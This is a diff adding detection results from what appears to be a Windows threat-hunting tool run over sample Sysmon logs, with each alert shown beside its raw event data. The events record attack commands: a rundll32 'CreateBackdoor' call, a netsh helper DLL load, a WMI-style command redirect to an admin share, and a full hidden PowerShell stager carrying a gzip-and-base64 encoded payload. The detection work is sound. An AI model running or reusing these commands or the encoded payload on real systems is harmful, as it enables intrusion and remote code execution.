+ C:\Windows\System32\svchost.exe
+ C:\Windows\system32\svchost.exe -k DcomLaunch
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[ T1086 ] Powershell with Suspicious Argument,1618950780.296686,2021-04-21T00:33:00.296686+04:00,,Threat,Critical,"Found User (MSEDGEWIN10\IEUser) run Suspicious PowerShell commands that include (powershell,\Windows\System32,powershell,\Windows\System32) in event with Command Line ("C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile) and Parent Image :C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe , Parent CommandLine ("C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe") in directory : ( C:\Windows\system32\ )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 578497
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2021-04-20 20:32:55.351
+ 747F3D96-3A77-607F-0000-00105DD17600
+ 7280
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows PowerShell
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ PowerShell.EXE
+ "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-0433-607F-0000-002073600700
+ 0x76073
+ 1
+ High
+ SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F
+ 747F3D96-04C3-607F-0000-0010F13B1E00
+ 2532
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1584766825.4512,2020-03-21T09:00:25.451200+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 243556
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-03-21 05:00:25.441
+ 747F3D96-9F69-5E75-0000-00102F962000
+ 6136
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ RUNDLL32.EXE
+ rundll32 windowscoredeviceinfo.dll,CreateBackdoor
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 747F3D96-9DBA-5E75-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 747F3D96-9DBC-5E75-0000-00102C390100
+ 1652
+ C:\Windows\System32\svchost.exe
+ C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1086] PowerShell Process found,1618950780.296686,2021-04-21T00:33:00.296686+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 578497
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2021-04-20 20:32:55.351
+ 747F3D96-3A77-607F-0000-00105DD17600
+ 7280
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows PowerShell
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ PowerShell.EXE
+ "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-0433-607F-0000-002073600700
+ 0x76073
+ 1
+ High
+ SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F
+ 747F3D96-04C3-607F-0000-0010F13B1E00
+ 2532
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.4512,2020-03-21T09:00:25.451200+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 243556
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-03-21 05:00:25.441
+ 747F3D96-9F69-5E75-0000-00102F962000
+ 6136
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ RUNDLL32.EXE
+ rundll32 windowscoredeviceinfo.dll,CreateBackdoor
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 747F3D96-9DBA-5E75-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 747F3D96-9DBC-5E75-0000-00102C390100
+ 1652
+ C:\Windows\System32\svchost.exe
+ C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+Prohibited Process connecting to internet,1608044415.695478,2020-12-15T19:00:15.695478+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( MSEDGEWIN10 and IP ( 10.0.2.15 ) to hostname ( MSEDGEWIN10CLONE ) , IP ( 10.0.2.17 ) and port ( 135 )",3,"
+
+
+
+
+ 3
+ 5
+ 4
+ 3
+ 0
+ 0x8000000000000000
+
+
+ 589974
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-12-15 15:00:14.467
+ 747F3D96-CF4B-5FD8-0000-00101AD58700
+ 6976
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ MSEDGEWIN10\IEUser
+ tcp
+ true
+ false
+ 10.0.2.15
+ MSEDGEWIN10
+ 50007
+
+ false
+ 10.0.2.17
+ MSEDGEWIN10CLONE
+ 135
+ epmap
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564436038.543692,2019-07-30T01:33:58.543692+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c netsh.exe add helper AllTheThings.dll ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4947
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-29 21:33:58.336
+ 747F3D96-6646-5D3F-0000-001051388B00
+ 3824
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ cmd /c netsh.exe add helper AllTheThings.dll
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-6053-5D3F-0000-002082314100
+ 0x413182
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-6609-5D3F-0000-00109FBF8500
+ 1208
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1584766825.4512,2020-03-21T09:00:25.451200+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 243556
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-03-21 05:00:25.441
+ 747F3D96-9F69-5E75-0000-00102F962000
+ 6136
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ RUNDLL32.EXE
+ rundll32 windowscoredeviceinfo.dll,CreateBackdoor
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 747F3D96-9DBA-5E75-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 747F3D96-9DBC-5E75-0000-00102C390100
+ 1652
+ C:\Windows\System32\svchost.exe
+ C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1602975185.720846,2020-10-18T02:53:05.720846+04:00,,Threat,Low,Found User (MSEDGEWIN10\Administrator) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 421225
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-10-17 22:53:05.675
+ 747F3D96-75D1-5F8B-0000-001061BD3300
+ 4864
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.592 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ Cmd.Exe
+ cmd.exe /Q /c cd 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1
+ C:\
+ MSEDGEWIN10\Administrator
+ 747F3D96-75D0-5F8B-0000-0020A8A83300
+ 0x33a8a8
+ 0
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-75D1-5F8B-0000-00101DAB3300
+ 2228
+ C:\Windows\System32\wbem\WmiPrvSE.exe
+ C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1047] Windows Management Instrumentation - Process,1602975185.720846,2020-10-18T02:53:05.720846+04:00,,Threat,High,Found User (MSEDGEWIN10\Administrator) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 421225
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-10-17 22:53:05.675
+ 747F3D96-75D1-5F8B-0000-001061BD3300
+ 4864
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.592 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ Cmd.Exe
+ cmd.exe /Q /c cd 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1
+ C:\
+ MSEDGEWIN10\Administrator
+ 747F3D96-75D0-5F8B-0000-0020A8A83300
+ 0x33a8a8
+ 0
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-75D1-5F8B-0000-00101DAB3300
+ 2228
+ C:\Windows\System32\wbem\WmiPrvSE.exe
+ C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1602975185.720846,2020-10-18T02:53:05.720846+04:00,,Threat,High,Found User (MSEDGEWIN10\Administrator) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 421225
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-10-17 22:53:05.675
+ 747F3D96-75D1-5F8B-0000-001061BD3300
+ 4864
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.592 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ Cmd.Exe
+ cmd.exe /Q /c cd 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1
+ C:\
+ MSEDGEWIN10\Administrator
+ 747F3D96-75D0-5F8B-0000-0020A8A83300
+ 0x33a8a8
+ 0
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-75D1-5F8B-0000-00101DAB3300
+ 2228
+ C:\Windows\System32\wbem\WmiPrvSE.exe
+ C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[ T1086 ] Powershell with Suspicious Argument,1556656012.356089,2019-05-01T00:26:52.356089+04:00,,Threat,Critical,"Found User (NT AUTHORITY\SYSTEM) run Suspicious PowerShell commands that include ( -c ,[Convert]::FromBase64String,hidden,Hidden,ls, -noni ,-noni,-nop,powershell, -w , -w hidden ,WindowStyle, -c ,[Convert]::FromBase64String,hidden,Hidden,ls, -noni ,-noni,-nop,powershell, -w , -w hidden ,WindowStyle) in event with Command Line (powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);") and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);") in directory : ( C:\Windows\system32\ )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 9808
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-04-30 20:26:51.965
+ 365ABB72-AF8B-5CC8-0000-0010AC1B1900
+ 3872
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ Windows PowerShell
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 365ABB72-2586-5CC9-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C
+ 365ABB72-AF8B-5CC8-0000-00101C1A1900
+ 3348
+ C:\Windows\System32\cmd.exe
